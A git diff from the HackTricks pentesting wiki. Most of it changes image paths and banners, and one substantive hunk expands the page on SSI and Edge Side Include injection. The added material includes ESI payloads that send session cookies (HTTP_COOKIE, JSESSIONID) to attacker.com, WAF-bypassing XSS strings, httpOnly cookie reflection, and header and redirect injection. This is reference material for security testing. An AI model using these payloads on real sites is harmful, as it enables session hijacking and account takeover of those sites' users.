GitBook: [#3733] No subject
BIN
.gitbook/assets/image (21) (2) (1).png
Normal file
After Width: | Height: | Size: 42 KiB |
Before Width: | Height: | Size: 42 KiB After Width: | Height: | Size: 190 KiB |
Before Width: | Height: | Size: 190 KiB After Width: | Height: | Size: 113 KiB |
BIN
.gitbook/assets/image (4) (6).png
Normal file
After Width: | Height: | Size: 58 KiB |
Before Width: | Height: | Size: 58 KiB After Width: | Height: | Size: 76 KiB |
BIN
.gitbook/assets/image (5) (2) (2).png
Normal file
After Width: | Height: | Size: 65 KiB |
Before Width: | Height: | Size: 65 KiB After Width: | Height: | Size: 590 KiB |
Before Width: | Height: | Size: 590 KiB After Width: | Height: | Size: 91 KiB |
|
@ -106,7 +106,7 @@ The symbols: **+, -** and **{}** in rare occasions can be used for tagging and i
|
|||
|
||||
### Whitelist bypass
|
||||
|
||||
<figure><img src="../.gitbook/assets/image (4).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="../.gitbook/assets/image (4) (6).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
### Quotes
|
||||
|
||||
|
|
|
@ -2,13 +2,13 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong><a href="https://www.twitch.tv/hacktricks_live/schedule">🎙️ HackTricks LIVE Twitch</a> Wednesdays 5.30pm (UTC) 🎙️ - <a href="https://www.youtube.com/@hacktricks_LIVE">🎥 Youtube 🎥</a></strong></summary>
|
||||
<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
||||
|
@ -25,7 +25,7 @@ And, when the page is served, this fragment will be evaluated and replaced with
|
|||
|
||||
The decision of when to use SSI, and when to have your page entirely generated by some program, is usually a matter of how much of the page is static, and how much needs to be recalculated every time the page is served. SSI is a great way to add small pieces of information, such as the current time - shown above. But if a majority of your page is being generated at the time that it is served, you need to look for some other solution. (Definition taken from [here](https://httpd.apache.org/docs/current/howto/ssi.html)).
|
||||
|
||||
You can infer the presence of SSI if the web application uses files with the extensions ** `.shtml`, `.shtm` or `.stm`**, but it's not only the case.
|
||||
You can infer the presence of SSI if the web application uses files with the extensions \*\* `.shtml`, `.shtm` or `.stm`\*\*, but it's not only the case.
|
||||
|
||||
A typical SSI expression has the following format:
|
||||
|
||||
|
@ -79,15 +79,19 @@ The following **header** in a response from the server means that the server is
|
|||
Surrogate-Control: content="ESI/1.0"
|
||||
```
|
||||
|
||||
If you can't find this header, the server might be using ESI anyways.\
|
||||
If you can't find this header, the server **might be using ESI anyways**.\
|
||||
A **blind exploitation approach can also be used** as a request should arrive to the attackers server:
|
||||
|
||||
```javascript
|
||||
// Basic detection
|
||||
<esi: include src=http://attacker.com
|
||||
hell<!--esi-->o
|
||||
// If previous is reflected as "hello", it's vulnerable
|
||||
|
||||
// Blind detection
|
||||
<esi:include src=http://attacker.com>
|
||||
|
||||
// XSS Exploitation Example
|
||||
<esi: include src=http://attacker.com/<XSSPAYLOAD.html>>
|
||||
<esi:include src=http://attacker.com/XSSPAYLOAD.html>
|
||||
|
||||
// Cookie Stealer (bypass httpOnly flag)
|
||||
<esi:include src=http://attacker.com/?cookie_stealer.php?=$(HTTP_COOKIE)>
|
||||
|
@ -132,15 +136,36 @@ The file _http://attacker.com/xss.html_ may contain a XSS payload like `<script>
|
|||
|
||||
```markup
|
||||
x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
|
||||
|
||||
Use <!--esi--> to bypass WAFs:
|
||||
<scr<!--esi-->ipt>aler<!--esi-->t(1)</sc<!--esi-->ript>
|
||||
<img+src=x+on<!--esi-->error=ale<!--esi-->rt(1)>
|
||||
```
|
||||
|
||||
#### Steal Cookie
|
||||
|
||||
* Remote steal cookie
|
||||
|
||||
```markup
|
||||
<esi:include src=http://attacker.com/$(HTTP_COOKIE)>
|
||||
<esi:include src="http://attacker.com/?cookie=$(HTTP_COOKIE{'JSESSIONID'})" />
|
||||
```
|
||||
|
||||
* Steal cookie HTTP\_ONLY with XSS by reflecting it in the response:
|
||||
|
||||
```bash
|
||||
# This will reflect the cookies in the response
|
||||
<!--esi $(HTTP_COOKIE) -->
|
||||
# Reflect XSS
|
||||
<!--esi/$url_decode('"><svg/onload=prompt(1)>')/-->
|
||||
```
|
||||
|
||||
<figure><img src="../.gitbook/assets/image (4).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
* Full account takeover by reflecting cookies
|
||||
|
||||
<figure><img src="../.gitbook/assets/image (21).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
#### Private Local File
|
||||
|
||||
Do not confuse this with a "Local File Inclusion":
|
||||
|
@ -155,17 +180,35 @@ Do not confuse this with a "Local File Inclusion":
|
|||
<esi:include src="http://anything.com%0d%0aX-Forwarded-For:%20127.0.0.1%0d%0aJunkHeader:%20JunkValue/"/>
|
||||
```
|
||||
|
||||
#### Open Redirect
|
||||
|
||||
The following will add a `Location` header to the response
|
||||
|
||||
```bash
|
||||
<!--esi $add_header('Location','http://attacker.com') -->
|
||||
```
|
||||
|
||||
#### Add Header
|
||||
|
||||
* Add header in forced request
|
||||
|
||||
```html
|
||||
<esi:include src="http://example.com/asdasd">
|
||||
<esi:request_header name="User-Agent" value="12345"/>
|
||||
</esi:include>
|
||||
```
|
||||
|
||||
#### CRLF in Add header (**CVE-2019-2438)**
|
||||
* Add header in response (useful to bypass "Content-Type: text/json" in a response with XSS)
|
||||
|
||||
****
|
||||
```bash
|
||||
<!--esi/$add_header('Content-Type','text/html')/-->
|
||||
|
||||
<!--esi/$(HTTP_COOKIE)/$add_header('Content-Type','text/html')/$url_decode($url_decode('"><svg/onload=prompt(1)>'))/-->
|
||||
```
|
||||
|
||||
<figure><img src="../.gitbook/assets/image (5).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
#### CRLF in Add header (**CVE-2019-2438)**
|
||||
|
||||
```markup
|
||||
<esi:include src="http://example.com/asdasd">
|
||||
|
@ -209,6 +252,7 @@ Check the XSLT page:
|
|||
* [https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/](https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/)
|
||||
* [https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/](https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/)
|
||||
* [https://academy.hackthebox.com/module/145/section/1304](https://academy.hackthebox.com/module/145/section/1304)
|
||||
* [https://infosecwriteups.com/exploring-the-world-of-esi-injection-b86234e66f91](https://infosecwriteups.com/exploring-the-world-of-esi-injection-b86234e66f91)
|
||||
|
||||
## Brute-Force Detection List
|
||||
|
||||
|
@ -216,12 +260,12 @@ Check the XSLT page:
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong><a href="https://www.twitch.tv/hacktricks_live/schedule">🎙️ HackTricks LIVE Twitch</a> Wednesdays 5.30pm (UTC) 🎙️ - <a href="https://www.youtube.com/@hacktricks_LIVE">🎥 Youtube 🎥</a></strong></summary>
|
||||
<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
|
|
@ -26,7 +26,7 @@ Usually, iButton implies the physical form of the key and reader - a round coin
|
|||
|
||||
When the key reaches the reader, the **contacts come to touch** and the key is powered to **transmit** its ID. Sometimes the key is **not read** immediately because the **contact PSD of an intercom is larger** than it should be. So the outer contours of the key and the reader couldn't touch. If that's the case, you'll have to press the key over one of the walls of the reader.
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (21).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="../../.gitbook/assets/image (21) (2).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
### **1-Wire protocol** <a href="#1-wire-protocol" id="1-wire-protocol"></a>
|
||||
|
||||
|
|
|
@ -33,7 +33,7 @@ and if you **remove the 2 ms waiting** period between signals you can **reduce t
|
|||
|
||||
Moreover, by using the De Bruijn Sequence (a way to reduce the number of bits needed to send all the potential binary numbers to burteforce) this **time is reduced just to 8 seconds**:
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (5).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="../../.gitbook/assets/image (5) (2).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Example of this attack was implemented in [https://github.com/samyk/opensesame](https://github.com/samyk/opensesame)
|
||||
|
||||
|
|
|
@ -59,7 +59,7 @@ In AD environments, **clients interact with Enterprise CAs to request a certific
|
|||
|
||||
### Client Certificate Request Flow
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (5) (2).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="../../.gitbook/assets/image (5) (2) (2).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
It's the process to **obtain a certificate** from AD CS. At a high level, during enrolment clients first **find an Enterprise CA** based on the **objects in the Enrolment Services** container discussed above.
|
||||
|
||||
|
|
|
@ -573,7 +573,7 @@ Now, since this registry key applies to Schannel, we must use the certificate fo
|
|||
|
||||
If we try to authenticate with the certificate and `-ldap-shell`, we will notice that we’re authenticated as `u:CORP\DC$`. This is a string that is sent by the server.
|
||||
|
||||
<figure><img src="../../../.gitbook/assets/image (21) (2).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="../../../.gitbook/assets/image (21) (2) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
One of the available commands for the LDAP shell is `set_rbcd` which will set Resource-Based Constrained Delegation (RBCD) on the target. So we could perform a RBCD attack to compromise the domain controller.
|
||||
|
||||
|
|